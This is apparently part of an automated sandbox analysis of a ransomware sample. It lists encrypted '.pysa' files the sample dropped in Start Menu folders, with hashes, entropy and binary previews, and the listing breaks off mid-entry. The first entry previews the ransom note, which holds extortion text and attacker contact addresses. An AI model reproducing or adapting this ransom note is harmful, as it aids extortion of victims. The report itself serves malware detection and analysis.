                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Resource Monitor.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.047768318508226
                  Encrypted:false
                  SSDEEP:48:LfxP4z9FpgnibzxQDOiW7LEXdQRKiD9gCXpqjg/ScJ+fa5jIBjXfDaA1V+oMBpBk:hIgnib1QDOiW7LUdb+oTDaC+oMfg7x8q
                  MD5:18D4FDE94DF3A967232DDA43BDD2019A
                  SHA1:389C208733A6A4DAEC483A5149A2AEB139CE9DAD
                  SHA-256:C72621281303343E3A935AE304B219848F21334CAC529AF4B7165B965EC17C9A
                  SHA-512:4B35C963B7E56CC98AEECE30A5D2F5C659F8FDB7077FC8F77370160653F6A53C0DCFB3C75D50B91E4FE7A1252D12444E98332083FE13C3A58F60DCD46DE066F0
                  Malicious:false
                  Preview: "..#+....F.c.u...(._.;.c\....?4?.P...l-.....<..s.A....%.|f..G../FT....J....b..F9.....&;.2..w..#.4...7..\.._.gEEg1...8u..j.i<.{.....\..T=..H.|.........Vz(.&.|WI..=.R.......d..G.IX,...kSR4..0.I.`z.M.v.F.+...d.ahNg...-|\...n..k.&..Z&]rE..{.......SM_..h..M.....F..8.!..6kZp...\....2...y.5q...g3,4{L...J.u."...EP..1./..#.......9.r<.).......%..wJ.n...nW.4..K.S..........m.P..o...)N....^.<.......~.G..7..T.Q...R.,.r.o.@..SEB.i..N.P....S^D?U.Q....GI....T.....02...vb.6:.j}.q.W..................}~..T...4n.S&..P...UA.s....)..em.b&...h.P0FX.-).U4.iwc.>....."n..........h..@..t..*4.~4Nz...=..0}.D.}@h..~.|3..s...lI.W.].Sa.7...tboH..G3&}a].8{..a`$.v.SP"A.uf.R`..,..vA.k.Kn..V..<..L*.$..<".3*......l.}....?+S.s..VW...<#....~...y..........jV.....N'!.0.F.1..]b...`..!....G....y.w.,....D '.0[".w..[..#..Y!..T..g..(.|:&.EM...A)..K............-.....v....r.........0.a{....{.u.Ky.:&....-..:....{.ucR.J......rK....3....(.. .M.}...yr. ..A...n....<...b$.9..~Y..jx.rS.P....s0.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.045163873113281
                  Encrypted:false
                  SSDEEP:48:KWheD9LReZ1p85ne5ZcRbDpw5RHAiy+p/bc1TBWk4K9ploShvzUdAz2jnBNn:KWheD9le5AZRGTAnIzc1EEDz5kAzmN
                  MD5:3DB0DDAA506822E4CCA193E134EF3A1E
                  SHA1:4D66B55BADB03D42C8D2CFE78BBD5DBD0D23C05D
                  SHA-256:E9C1920E88F7F227D5B2783F7270340E069FF8775A243E3A0EEA8E6C33B512D3
                  SHA-512:C48AE86951A2252459218B432269FD290A388B9D359026A2870704A5492A92205907E82E6ED77BA0A985F1D06ADC6220BBC154D44AA5918BEB60F5863C4CABE0
                  Malicious:false
                  Preview: .K......&G.....M.....Va.bD....|.M.I......h.(i.j:......B.?x.....s..5j.5....v......y4..n3..P..@ vO...U.k........l[Hm.4.S.....M........I].s...O...8:.O`:..%.....}.......b.K7.h.Z......p,$........ys>.CI.'.?pK..&......,...y...0.....q.....)5s-...B....E.$I..PvOg^e...8..\i..sqI.7L.P...<..M..w,"C...E.....K7.'}/...|t]...}.i.8E....sM.M..EW8X....:.9K......!.'.|I.....\...4.....?.....8............u.\.....1.`.4.:...y..F..w.>..4..".h..0.F.UL.......&.b#.<6.)....4..[Z.Z:>..B.S....].jo*..O.V.J...TQ..l...... .AK.....(,(,........|...K.I....#.,.)....~Z?.....c...B...w....*$..I..){..:..).p..0^4.m.V...-x..z..Q~.....kv..e.o.....Y1H.8..T.t.=)....z.V..s?!.......pI.....!B.X..G..q.m7.w+......`..I.Hl...`..H...~.&%%....vk.9...y......M,t8....H..y.p.e...Lf.f..%..J.......=._.tCP.Y.s..<M......:...L...K.[..~..EdC$..(..GV.y.I..2.....#...+}.....h.[.m...fl.V..Fb......3.......i'..-..[..MSe.A*8..L...q.d..0eV!3o....y.i...m...".6<}..s.Ed.*.L.M.}.b.?2...A..JA.eb...XX....q..B.N..G..:....m
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Configuration.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.055506247085594
                  Encrypted:false
                  SSDEEP:48:X1FokegPu+bCTUqtTPJ/eChZvnd/0Y83AzgMOz2nWJ7m36qlsSRhZD/3oRHtJd5T:XLru+W48tZvnE36M6J6qlsShB+w58MG
                  MD5:761AAAE4F7E0E27984A21F0C0C29FD23
                  SHA1:718A4E31CB248BF05E19DB12B26204B406E26243
                  SHA-256:55F54857C8AD27C9A054A7ED9D88DC79255FEF8C5F51C10A8CDB1A1A7669401A
                  SHA-512:3028B220AB2E9F189778DD0F720BEF361739D8453EA417D219A6A1ECB56EE005EBBE90B12DBFAFAE7A586A2AA157E6EEC41DE618967FA2B22E880427182B065B
                  Malicious:false
                  Preview: .A...g......@.o....(mj88......r.`..V|.\u8..#:..0.......%..L`..P........2.d.......H.u>..u.Vc?..v7...p.._ctS.ni......k.c..>.rFw..8..V>.`Pn.&....I......VC@p...f6hC!?z.X.'....O`.V..w.....H....:.1..7..*6......<L..l.....2.h#..[<.+g't..%.....|..'L...\....h2.%X.<dI...Hp{...Q}P...r.M..eR..Jf..pG...4..c...^,u......oDX...}..q..q....Z....h....X.~....k..yD....<...)...q.sj*Q.3..........L{0?1.W."..C...N.45#.{..vw..[}....../F...).s..H.@..l.....1...6E..4....(...I...W[....=.[!.....VPAo..H.....Os.9.9J.G>..u....F._.........,V.....H..!..o..a...U.+.."@.._."..O.].....x3B.oP...m....P........$It...kU.b:.w.~.....va.Z.Mi%[.18.6....._.K..........y.]..s...+z&./.Q.l.*.EY.$..eW$...!...w.....M&SLl.q.l.-...?..wa<,^.....~..2.2..*...F.....r.l~~).?..D..r.......5......`.e...`C.xD.p.....s...u/<..O....V..2&.*k!.hCY.l.s6..!...%...,.TNU......$..|..~.|.Y...W...&.{...%.O...y..f..|0..?]U........-._.*o..W...A...!......AD.m(...*7<..<B1.I.z^.r....J.e.W..+.\....l.D....bX....v?...=..-.?.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\System Information.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.044387413649741
                  Encrypted:false
                  SSDEEP:48:T9c/G6iLOHbIaeRng/1Ml6KinFIvlh9qz/68xPVeTIbDAWx/YwicF34VYFGCRBn:TnTCHbrImHKiMBqz/683u4347CRB
                  MD5:603AB1D2417C39C88F1272411C44C856
                  SHA1:0B555642213C33AEF38F1E4AC99B51DC16E84B19
                  SHA-256:FD059BC0D3B8E81F29D3806B76FA57172E8F5690C1A9D3996BEA2A324DFCC116
                  SHA-512:BA327728AA0013A32AF356C37EC0C0918DEC0534F9316A0B6E854F6992FF95A5691A2760933E853A3F135DF1C54A79040A2C24871B17B52CD4B26AD56EFD0BF6
                  Malicious:false
                  Preview: ]....../...........=....F..O.+..J..Jp......I\Y..t...........<..R..W..S.x!n..$_..!.HG..i..:Jz...`..v...3.....5b.A1%...9TK$..........F.,C......u...].E...~[....(......w].TdM^.......7.w.a..._."....]........h..wM+|.F....0..4qmn...S..`iD..H.!C.+...V{.{..=..?`....T.E...... .`..1...2. .P...%...'>..K.^..A.Gk...H...*&..P<>.oC]..._f.......;.k...F.u]z..'>tA.z.*..}....!......bP<9.T..\P....t.. Q.,:....H...#.6..G.....7.Q....l[..?[!.1<N.C.R.q...ni.>C....T...%.8#..6+4....-9...p..0..~&:..v7..V.o...... c.....!........n.?..t...iC.\...[...#wfqc.^.o...*............0B.2/......#v..v2.q/.Ca#R..HQ.!tX._.!Q...8B...V+..T......r....a....a;.b.U/.b....B.n..uC.$...}O0..6RV..l.....vW.7C..).....W[^v.d\.v.........2....u.F.t.......H.%.V.F.aYQD0'...<....."/)'o.6..I..U.x*..lB;J..."Aw.j"..2. :.t..sB..x.........e7.... .e....,v.rnqp...M.............{H.b.O?... .!....w.......q..4r....8sw...c.+|.=/O.*E..&$..j...(y..(!|Vi..c7.4..5...?5...)?X&3...#_....~....A....Y...B....!..4.|W.
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.05088261767325
                  Encrypted:false
                  SSDEEP:48:eBwB1rickgYfnAoFJWhGIVEN9FVCJ9H7CSG1s/W/+QQX5Qf98SS+U:eBYriYY/rXW8xXsCSG2/DQGeOSS+U
                  MD5:FA81826DFE4F7B0BA091D1E3EFC0FAB7
                  SHA1:5E485FE47A7B4CF2A6AB0D20A7BEB0C2F234AF6D
                  SHA-256:674A7F3764E190D8479FD5E7D26210F89E2F79CDEE0C03828A58A7C872B1C787
                  SHA-512:680EFF0E836D34B95EFAF61E51ED8EB744A81C19A70BC21CD60A100FEEC89BCFA0D99EE09A63A06F55B0E60A03A20CCCF390C7178B00577EDE1D6189B9756538
                  Malicious:false
                  Preview: h..m.?YQ".W&\:V`4.......;...`}.c..#5..Ju....HW.\.z..y....:u.".}.Sw..8r..S'.=....%.....K.L.S"WQ....H...K6.U....<........'..$..4\<.:....4H.6p..............d5....9A4b{6E....f......J.._.....#......X..e.xgH.p.vK.[1H&@..f.p.P.....<..na...9b.j&2....p...Ik[...%.5W...........CH.eR.G.TcO.).K..:fl.P.4....\..kUJii. ...|./8K...o.cB;).).D3.s_.Tl.......Y....9...+......7.....-qkd.N.$6s...c9(..0Nb...ul.]$...CZbh..........=.t..F.......k..`6.H.....0..G.))S.. 0Q.....~.K.C..8g.v@....$....e.....LX....r.y]3....de.y.QW.1..dV.Q?Kv....t....1Q..z}..).HD..s.......EI.3 ..M..B[o..K.].%Z....U%..J..[.:.....:CNL)..icyX.B..d.I.......'..W.F..Y......L..:UEO`..K).!.j(...5...Q.\^ ...u..M.#`.TNw..Ke1.....W.5RL.%=..N#g.P...M...G.O............k....:........j$FK..ac..8.!..&.@.'u...p..'{.p>(..d^Q....h..b).....h@\...+..QC..H"...Q.....;.iE....Q.6_..N..~`8..?...C.3\..#b....N7..>m.....&....'...t...S..X..|~....x.\m......R..@..R.....+.a*.57.<$...Ma2{...........>z.s..^LX.......DC`..N..A=.)
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows Defender Firewall with Advanced Security.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.053474636354847
                  Encrypted:false
                  SSDEEP:48:oduVxXER+j1znoRVr9dOu/bb1cbzMks0pj83g7vP4VA++H2C0prMhbxiFUhB+yOK:guVKPRhOKR0MnS8w7ngA+Tih1Lh7WDlW
                  MD5:BCB7CC5020200BD8ACE57545331A7867
                  SHA1:C0B2C040F964F77EB5D98FD11E698B54A4BEFCB8
                  SHA-256:FBF5AA7F69A76C8F617379C3BE8CB304DABDE1D2E64F6578DD780E4A34604508
                  SHA-512:BCD593A598711904449508CF5E921FDB8C9D1288E16C35E0E68B14DB60527A112D7EE509872A2570F2203678B9805991332B9A7FA213B05F0D62EF7C08266AB3
                  Malicious:false
                  Preview: .T.h..Q.....>)..v....B.~...c..b..0.>y......f}..Z..&.Kb........cF.g....*.G[....:...v_f..q.....*.E..~...P..Y.sy.E.c...cb.....i...j..f.k.R.....Q.M~i.C'....gn.&..^.../..&%S?.K|.oT.FQ..........9@..._.h!`..T.#..=.#"...?n.`...S."..e..3...%.`.C..K.u..'X...1).e...=e....b/./&..1.......;{C'./.L.7.714.B.bv..S+H|...1.~..V(.I`...q...r..g`......B&.....0..i....^.M..l....Y..0W.F.A/..)............W?..e..8...j.NCn.....V~/..d.........W3.M8_.n.!.CD.w;I;c6.|.Y..42...e.u.W...!...2e#.....&......6.5.*..c.U..e.">.._x.....#....e..?...,S.!....p.......2|.)....[.p..0`..|..u.Lrr.m...!....J\.5.C..._Hv.8q\..7...S.Q.....C.3...>bp..vv.97..o....$b....!.....6dta.s\.NIGx.....%{...l.[...d.s.7N.)Ts7 G..CZH...t..^.=.h.V..^...].2..(.a..............O.f.......g..y....L<..t*.b.8(..af.)G.......L.D......Q.0P..d..;..=.#.....O..)....X..f...}...z..>I.N.....&.....XP9.4..Q...D.$.a.....H...."....$.....s.3<..=..8Q\.}!..0..+tdTf..N+)..r...i~uh..wL..:d.N..|..4..D.."...Bg..v.........~.0.~..|
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4096
                  Entropy (8bit):6.782965311863101
                  Encrypted:false
                  SSDEEP:96:FEKRce0DWFvfE2kjcmK7MNSTtH+qx07fEsqjk5a8AZJfRxlf:uUcFLjcEMeqx6EVgw8iJ5xt
                  MD5:739872A3A9D32BF52F9E128EB3A8C4C6
                  SHA1:832961DEDE912D961350A15D20AAFC12A87E0768
                  SHA-256:EB5063DCDDFD6A8C6976686FF8BE116AFE4B06F46CAE972000D3838F1FD01D9F
                  SHA-512:72568332F9BF8C3A315A71991863BFC167CE4D9C52D8B12B3A9E4E8E449099BBD3B79E549BDFD077D69D6B3163DD8E7AE901BDA58DE30C447103D2E38350A729
                  Malicious:false
                  Preview: .........4G..b...zV....)...J}1....d2.l.......'.S+..!.........7N....pR1e.~........l.C..lP%.Y...-..plY.E.6.^.|....w..H..$I)d.)....H.A.B.....'..e.....).ED..I..2..&LnW...X."...d.bo\ .m...q...*...!Z.........t6d~..?..$J..z*z.s...b.6#%5...YvEb..2.W..I.......-....U.a8+1.w..oH........q.u3G.t0 ...N/ 2...p..W.........JmD.2c4...........{?l .3...!.X......^..c.$.....B...}V.:...8X.9.{.!..L-.}~.....,fq*..L.u...s.8.FAl!...(s...:.....E7...E.b.x|.CV..W.i..f.E.9..(...?._IHv.8\...68....lD...Z.#....\.......W..0.MU.I.nF}...L/...}..s.......%...1(|.f0..=ig>.A...o.W..e.^...%N.P.P.!j..2y.F.C...]....|...f...K.~....t:8.{D..R.fh.b.....U.....E...U..ONZ.:.n.......e..lI.B.zO.....teK+f.j>"mq3.*......@..S...1.....Gj..w....t^-...]W*4..?..\..Xj.......Th-D_..jH..m=.?."\>0=..3....v.IkB...`.r.4n.F.\..iZ..aS.....u..5.}.S.4.o.p..{j.m?0a........Z.`.....J.V.....r.......$......5..Ch....Oa.J.M.P`:....R......(8JkF.P.......o......$......&..R..iK...Hcg.g...1......O..E.9
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\dfrgui.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.077774685836253
                  Encrypted:false
                  SSDEEP:48:8XRXOjIOcDRq9k3QT7SpSMx4rt6s8E7ltmjyGJUBydNPyyjpsdIvgiIK9LNS:8Xttf8kAT7SD4rnl4/JpdNaqp1vh9LNS
                  MD5:88C23200BB5A09904E753FA7C1F3DDE7
                  SHA1:B36349A66445219A99982A392E101365090856FC
                  SHA-256:EA4828A71563A53951887426B6F8B602EDAC892B67AFB6FD19B8BAD534339D50
                  SHA-512:D3B23F3CFEE5A6A9472EE76EB111E27B70D815E1079A0531DD0B4FFBCC4377DC25F8B013F38F15959AB8669F6CBAD7BBCF407F27E5298D039E9C360858873E5D
                  Malicious:false
                  Preview: .wx@J.}.....B..=:...8...?)x..a.S.b7..1.+...@u>.g:7....J.."........h......)..:..)Qx..N..f...g..R-.>{-...a...h..a"!.@.8:34.SD...u6....^......1".H......`..k.88P..v$.p........Cb..c...(....PKY....O..".\.........$.=...$#y......Y......;.\.$...l.v.wH$.l.C K...\.....O;.w2.....V....=...^.5...h.%.I.J^...I..h....T.......]U@.}.\.r..!.W......&.h] ....\[..j...deo.|2.nz.Q?IA.T.My..j.R.....:Gz<gV..\I..U.H......d.|.Qt.s.)q...`...."@..X...../P2.-.W/`......r....+..l..&'q$R.m.....1BH.....j.K4.\S&.r...u..'..1.BW.]\...o.'.q4.....g..3. qH.~..;..H..f..m!O...r.:.H.[.(....<..>....C.2.y&..4..g..W..v..a*0...>..f..W...{5Y?u.......l..?.........ze.4.........I.eT....e+......}.Kh@.HY.D.r....<..ie.....5.]zF...].#...TG.<.5.....H...p..a.H...,?.....k....-k4./...;..QS...FE.A..Ryg......Go...e&.`...._..-G"...r.=.....%..w.~.R.nl...|.X9'....6...5.W.......eEr'N.".-.R..@|..=.s.).....d.z$......R..;.M.I#.. .gQF..p|...I5.v...5..x.UO.d....r...h...+5.,J.y....Gt...O7U.......C}.)[
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\iSCSI Initiator.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.057789330222501
                  Encrypted:false
                  SSDEEP:48:iZHpmXZgrs8BIKaxSzaWb6wZGuXdOzagY19Ly1jtpJLe2t+LXaJioCaaC7jTbhg1:i2XZgrs8BRMPWHZLXEW9LydtpJDtqjoM
                  MD5:7D5D00E95685193519B0C0D68821F8FB
                  SHA1:69DAF048803BB9D841A989B59D2C8DA2E46F31FD
                  SHA-256:2C14CFA46F3A34528CF41C23B6C9118B923B72B8C4D44A5FFC73D7E7A5AD1310
                  SHA-512:A5BE02AC9B5F882C9869C4BAE25C1396211D61C038EC549AFF212BF3CC150892340F90F871ECA0291E85ECE0059BCDDFA7136820B04D41BAF3DEABB001D410D4
                  Malicious:false
                  Preview: .>m.2..........*.Zb?u|>.$..?.}'^...9...~1K.s.a\..%.t.Ky."..4.z..xO.T.........l..\.E...j1...?...La...H..5AO|.........&...4.@wV.;,|..D..u..8%$9...TZ..lg.....G<......3.D.../t.. A.z........2.9.....(.6f.q..O.F..n...O`y....`....Q.......uk..+=..`..+...s..B.....z.).BX.ZF71'.p....*{..Z........g... .fp.7/t.U.p(...8.2.]..d.$.T...........#..|...B.....60.....I.l....8...YdcUa........}.x.Vjp..F..........d.q...M|.....gy.|..#..^..Q ...h....^.m.>:SX...kGDB.U[.49.Bl#....X..35....@...O.9..Uo.....~,#O..M.$.>u...O..5.]..N%F.2RO...\Q t.)w+X.[cV$.A.#N......WZOh..S...@h.nW..........X.....CRYD..E.W..V.}.iN/Da.;.-2d..W3.M...~......Iv...GU.i.4!{....N....l...R.8....o...jA...I.@c|...O@9GRK4.qPQ_HWpv....h.a.$S.<.Ry.Q...V..s.r.......+9k.u....g.b..[.&..^.w..)U..t.......Q...s.{Fi.+J-.Q".E.....p.L.....L.9.S.5V..*...sN.RH=..4..MH...P...]g..w..q[j.%x.hT.w...P..G_M...)........v=......L.....o...E..`...#2.k...........]..*...#k...}.l'..u..$z...t.q...=.m$...!1...(....
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\services.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.034066996888035
                  Encrypted:false
                  SSDEEP:48:+PlEfl5XUfgit4SgZ9wtwZqd9V3/DnhsAUUv2d7cggGd/j5pEjjD9daRWYML26Pq:3jXeHaSgZatEqB2A7ud7cggGZjsJwfMQ
                  MD5:F1938CDD6735BFFAFB43933C4E0B7CC3
                  SHA1:97EF7C77A05BF44BB82F416D7EF37A0AC79BDD05
                  SHA-256:77E15D4676A47CDC816659E90BEC1C24F62EAFA0E964050EE673A40C73E68358
                  SHA-512:EEC4E3CEB986E7CE700A15023BBAEC8337A031B015492EB21B12E72C57EC8A01CC9B077E8287D8E3D626A392B0E8CBE01BCE6C743D7C3A5A9DCAFA51D31CCDB9
                  Malicious:false
                  Preview: .......W.....r...-..E ZX.."Q....!@..f..G.a.>.a.._7......@.Tx3@.s.&..r.x..pu?.....iU]......(yB[U.....;.F+.o.....ap...?...C.ggu......[.....Yd...>...6...P8...-...R]4.-...x....6?0.N.}..Z7B|Z5_D...}y@;.+....8l.4:.d...JB..a..wx..)I..QDFo..{'..p2...'V4>....EJB.sH6..Vi'C2.".R...e9..o..9....!<l4(.cpE.o...,...^.s..qq.....1k........\....N.g...;.w..K.?...|E...j.<..Z....B..iY..-i.j.1X..D4.".,G...At....ny.q.C.8..AP]OE.w1u."y.\..3.UC^v.V....ndZ...........}..D...I;.....%.3.BF...n&..c......S.V......i..\]q....B.....=./.[._.w .J.|.uK..r.W...\...S6..H7..M./.<.".7..R..~..(:u....Q.a..?....eR~..2.:./.....<Uw`{.G.K.@..K..Y..O.....G..S...*.NH_..c...U..9?..}?z..OK.&.....t..'].b.s..ea_C%....F2HY...ko...3 .Hnn......L!....l..\s;.T-.\.......2H$-|..g?d...$..lR......F..3..a#........#..o...h.......h....>.|E2.h...!.....v3.t..2c...7../0..W..Zb=.S...u.|9l...4..?...S..w....1G....qg.J..l.,.........4...9g..k..`.........<G.D.>r.k.DC...L..)}.. ...%..@...6'q.._.PH"M..K%$.k.g.JI..w..=y
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\AutoIt Help File.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.05972611295568
                  Encrypted:false
                  SSDEEP:48:4tpSxA9hIV0/z5wzxzAyh7D2bB1jrDStvcw0dZAVwjFXBjgNy42NT:4iSU2VQzBoB1jrmGdZ1pXBjgyf
                  MD5:1541A4D8FBB4B5CC60024237CACD62B9
                  SHA1:D8210AA8A48BE45E683AB62E3523DC7B0F4548E6
                  SHA-256:3A3DE445588A9475A59B5D060967B082510B131E384EEA51850A51510EB536B6
                  SHA-512:D33B3B6FEE3AE1C0826A948E1890D622A28EC12BD88FBCD058C38BC85A9E8C90DE578B569BC2A94D48696A3D2E9B6D7486E2A91C618BD1D976D9FA1C448E911C
                  Malicious:false
                  Preview: ....H........e&..E....g..TlM..Ue.....L........:.+.>Y. .......l.k...5.`..[...g.s..RBa.m'.B...|1....0.... .C...wV.9\.0k...9....7:U.E.A,..(..w..X9..y"tF..R....M.M.........o@.A.7..ze]|(..G/..._.1%.....h...;9Q.X(.a0.Lj....`....F....L.~w...z..x...8F.&..%..?6Z.U.hZ:g.?.~.......g.5XC..&....a.I..Y.|.!..d...g........x.....B^...O'......?.?=.[._...z.pM.S......$...11.6`..K......&}..<.5....A.$z........].<.Q.OJ....".z|.\.*-....g...T...f.|Q......k.J.g......2+o.Zd_.7....O.'7o..S..}.......#x{.T.Xz(...a-...#.....v{(....\...:...S..^,P.......lz..=.....&.|.j9G..%.o<NJ^m.... .%j..5Y..:+.!.s.I..Y'...rV..o..l..A..-..v...^g.;.u...17Jth.....z;...R...XEC@...p...zX...#....".W.%.;|..=@q.Q.L..{!....m...&[..(.153q.3._u.[....6..A.{.KF..p.......1.:q...3.|..Oo..&N......mc3...3[...)..A....J\.dG....Py|i?.. ....\).../....Q9.....`..+^.......d.*...T.4ades..z.?.e.S..wi..z...3&......A[T.TN....../N.|3.K.q.;.=b.h|.x~.d.k......JLGh....'.F....P.......?zv4....../.....D.I.&.'j%
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\AutoIt Window Info (x64).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.040110220920717
                  Encrypted:false
                  SSDEEP:48:inR31MPPFpgCCtjsf/musDGexqvpPyumCcNTDlbJbOp442K5pskjxlTQkPg:inR31OPFnXfuXie8NyFHNTTOSgMk1RLY
                  MD5:0DABA175984D6638C0D289B95324C554
                  SHA1:0CE038B5CBE9594B984D5C21B1503C1DCBA7C9CB
                  SHA-256:5F448F5D88F80C124D861DEEFD4EA647821A0F60A4C7C85E76C3D2D59A43898F
                  SHA-512:5FEC56B872005FD4F58D2BC49738D183162B9DDD8FA5EAB47F6C53FFE2F2C78EC076FDA68A923C95830C401EF578CAE89D8BFB92FE0BCE8E7AC75144348CD999
                  Malicious:false
                  Preview: ..z[.%.L...z.....H}.H._....t.U..A."...v..|3b:.....{O.e.Up........sD...(/...Y`Tc.+.....c4).z.J}&..C2.5.T1..X...&.!.=.x.,..M....5...T|r.C*.G......r...>...%..D....`..F.B.N...c\5.-"........%.W.o...[X...."'..Z/....A.a....n]....R.....i.\@..k.TF.\...!......j82%m.l..|%=_..F6.).t.SS%.^.b.>..,..?X...e..../%...2.MZ......?v.4..b-.-].O.....Z_.Ol..zdh..P..f.[e.kIHIo....\@.$..>.S....m..[..Y>.Z.H..}....{..f.D...nl..7+.lB...ur..OlV..@...:..'M.u.G{6..8....E.x.,a/..f%Q.8/48..V...(C..u..>.;y..v7..\....y...B..E~$...7..D.R4....E....6Aw.....ZL.}.......[./..A.......6......o....o....mW....{.]..3...S.m.!.....7....'|s..N.6.@u,.g.!...&.!9b..N^..#..<......A./0'.{....nws...b.k.s.^....T....tu..WnA.A.G..=H..*..b..s9.=1F;.^V..ZB....(...t..p`.....a9w.......Y..+FB9Y..|TS.5.i.W....`@2.s...(S....7ty ...W..v....{..r...l....qVVIF-.......H.,.7O...0.....C.Ai...i.#p......W.X.ZP:...rH}..g.H.E....I*%_k...(GZ.fUu.D.].v. P$.......Y.z..dmoo.G..g....3W...2h....}.z.u....
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\AutoIt Window Info (x86).lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.053331475612381
                  Encrypted:false
                  SSDEEP:48:/IUQccDtaeW1uC6bgJzpB7UBU0JeayxDAmZk2jAo+KVnU3bkFc5DYCXzbIluY3:/WDQeWAC6bsrQBUged9AskcAo+KW3bkV
                  MD5:7EF6058A4B82993BFC9CD301D86858AA
                  SHA1:B6C4B51A19374DB072675C9430BF791B47EC4727
                  SHA-256:56C0D6EB1BB29C6CAF1B2A51A23F404F0E5775C7B4AC5B1941EABD3FDF438162
                  SHA-512:EEF29BE3E0012E006DBF09D4A1B20B2C4B12921DC081A79577F97423D1CC3EDCF7F86E4A3235FB97B6E46E9BD5149C73B0B73E82F8853028380AB04DD674905F
                  Malicious:false
                  Preview: ...n..{|.v......a%......W..%...z0.....4/...B*.|U.y.J.Z.]..x&.6F..R%..siCsf.a.X......e.RIOnK.T..V......<..o...+...F.I...a.UJ..2A]#.bw...M..'?I`J.8.....G..5.`2..x/K....<...7a.>zM..3.=.c...K...f..6l......{1.....Y..TlR5tGh..l.....,.Q..~b...l.{8C...-...4.A.f...&....$........+....,..o.v.....+m9..e.h..f..X.z<F.F...ox.s...HR.N.]...*9{.IU.P...t....ZR.|Q......o0...../.l......ZR.S.Fa......t....\.... . .#/..=..R.P...YO..HE..j0U...+I0<..D..n.#s.F.B....~.9......~D./t.....gZ.../......<....^...s..!.h.<....%.......S>X....up..M..v..1..c..2.%WW.....Q."].!...r..?..,./f......Z.x<...gF...........N....9.....(.3.9.....|.,a....2......N.]..:\K...E.%..y ..uV.......{.I...ms...`...p.W`~E%5..8..}..n...Gt.....Q.}y*a.....h\5.hO..2. ...V3=..=...'$%!.lY........2."K....'..P.e.-..?.,+c..N...R..x.[x.....Rz,7j..Z..t..<F...{C...Y........;X........xzu?.e...c..?..,(.Z?^.Q..2....U.o[c{.8{.Ht.......2.....f.#."....TdQ[.-....ZSW..s....K......$..0....V..(l7....o.b|. JT|.tw...F..
                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Check For Updates.lnk.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.072461317195369
                  Encrypted:false
                  SSDEEP:48:z4lu3DHdkn1MaJTkH+miC6BCc4Auzg2har4kC3gj1SDeVpaHspeDef1c3dBZl:zCwHdknaiC6BC0uzhodnRpPaMpeDe4Zl
                  MD5:01F82AE4020D63C1C29BA053DD929EC2
                  SHA1:8648A278CC477DD6EEAE02EFED22B0BEDF7A25C3
